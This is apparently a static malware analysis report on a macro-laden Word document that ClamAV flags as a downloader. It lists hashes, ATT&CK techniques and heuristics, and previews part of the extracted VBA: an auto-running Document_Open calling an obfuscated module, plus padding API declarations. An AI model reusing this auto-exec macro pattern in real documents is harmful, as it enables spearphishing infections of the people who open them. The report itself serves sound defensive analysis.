Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 fc9a1081464d1f5f…

MALICIOUS

Office (OOXML)

191.3 KB Created: 2019-11-01 07:42:00 UTC Authoring application: Microsoft Office Word 15.0000 First seen: 2020-07-24
MD5: 35c410f461d0568449e8e1ce9071c9c8 SHA-1: 39a53a01fb53f594072dc83a5cab2dcf92506290 SHA-256: fc9a1081464d1f5f3ace27df6f8c1a1a0edf979934d352eb4e022b575428e606
282 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1059 Command and Scripting Interpreter

The sample is an OOXML document containing a VBA macro that automatically executes upon opening. The macro utilizes the Shell() function, indicating an attempt to download and execute a secondary payload. ClamAV detection further supports its malicious nature as a downloader.

Heuristics 6

  • ClamAV: Doc.Downloader.Generic-8011192-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-8011192-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 49603 bytes
SHA-256: c90c4da9489b6dccc4fcd17071af4306e81eee0b2d796956b148d9623ec6d451
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    jfkjg345g.skdk
End Sub

Attribute VB_Name = "jfkjg345g"
Private Type STARTUPINFO
    cb As Long
    lpReserved As String
    lpDesktop As String
    lpTitle As String
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Long
    hStdInput As Long
    hStdOutput As Long
    hStdError As Long
End Type

Private Type PROCESS_INFORMATION
    hProcess As Long
    hThread As Long
    dwProcessID As Long
    dwThreadId As Long
End Type

#If VBA7 Then
Declare PtrSafe Function ActivateKeyboardLayout Lib "user32" (ByVal HKL As LongPtr, ByVal flags As LongPtr) As LongPtr
Declare PtrSafe Function AnyPopup Lib "user32" () As LongPtr
Declare PtrSafe Function AttachThreadInput Lib "user32" (ByVal idAttach As LongPtr, ByVal idAttachTo As LongPtr, ByVal fAttach As LongPtr) As LongPtr
Declare PtrSafe Function BeginDeferWindowPos Lib "user32" (ByVal nNumWindows As LongPtr) As LongPtr
Declare PtrSafe Function BringWindowToTop Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Sub GoodNight Lib "kernel32" Alias "Sleep" (ByVal milliseconds As LongPtr)
Declare PtrSafe Function CharToOem Lib "user32" Alias "CharToOemA" (ByVal lpszSrc As String, ByVal lpszDst As String) As LongPtr
Declare PtrSafe Function CharToOemBuff Lib "user32" Alias "CharToOemBuffA" (ByVal lpszSrc As String, ByVal lpszDst As String, ByVal cchDstLength As LongPtr) As LongPtr
Declare PtrSafe Function CharUpper Lib "user32" Alias "CharUpperA" (ByVal lpsz As String) As String
Declare PtrSafe Function CheckDlgButton Lib "user32" Alias "CheckDLGButtonA" (ByVal hDlg As LongPtr, ByVal nIDButton As LongPtr, ByVal wCheck As LongPtr) As LongPtr
Declare PtrSafe Function CheckMenuItem Lib "user32" (ByVal hMenu As LongPtr, ByVal wIDCheckItem As LongPtr, ByVal wCheck As LongPtr) As LongPtr
Declare PtrSafe Function CheckMenuRadioItem Lib "user32" (ByVal hMenu As LongPtr, ByVal un1 As LongPtr, ByVal un2 As LongPtr, ByVal un3 As LongPtr, ByVal un4 As LongPtr) As Boolean
Declare PtrSafe Function CheckRadioButton Lib "user32" Alias "CheckRadioButtonA" (ByVal hDlg As LongPtr, ByVal nIDFirstButton As LongPtr, ByVal nIDLastButton As LongPtr, ByVal nIDCheckButton As LongPtr) As LongPtr
Declare PtrSafe Function CloseClipboard Lib "user32" () As LongPtr
Declare PtrSafe Function CloseDesktop Lib "user32" (ByVal hDesktop As LongPtr) As Boolean
Declare PtrSafe Function CloseWindow Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function CopyIcon Lib "user32" (ByVal hIcon As LongPtr) As LongPtr
Declare PtrSafe Function CopyImage Lib "user32" (ByVal Handle As LongPtr, ByVal un1 As LongPtr, ByVal n1 As LongPtr, ByVal n2 As LongPtr, ByVal un2 As LongPtr) As LongPtr
Declare PtrSafe Function CountClipboardFormats Lib "user32" () As LongPtr
Declare PtrSafe Function CreateCaret Lib "user32" (ByVal hWnd As LongPtr, ByVal hBitmap As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As LongPtr) As LongPtr
Declare PtrSafe Function CreateIcon Lib "user32" (ByVal hInstance As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As LongPtr, ByVal nPlanes As Byte, ByVal nBitsPixel As Byte, lpANDbits As Byte, lpXORbits As Byte) As LongPtr
Declare PtrSafe Function CreateIconFromResource Lib "user32" (presbits As Byte, ByVal dwResSize As LongPtr, ByVal fIcon As LongPtr, ByVal dwVer As LongPtr) As LongPtr
Declare PtrSafe Function CreateMDIWindow Lib "user32" Alias "CreateMDIWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String, ByVal dwStyle As LongPtr, ByVal x As LongPtr, ByVal y As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As 
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 182784 bytes
SHA-256: de12f656390f80562ebe2b14d0091d473d6453a9c85b41260faa040091b8f647
Detection
ClamAV: Doc.Downloader.Generic-8011192-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.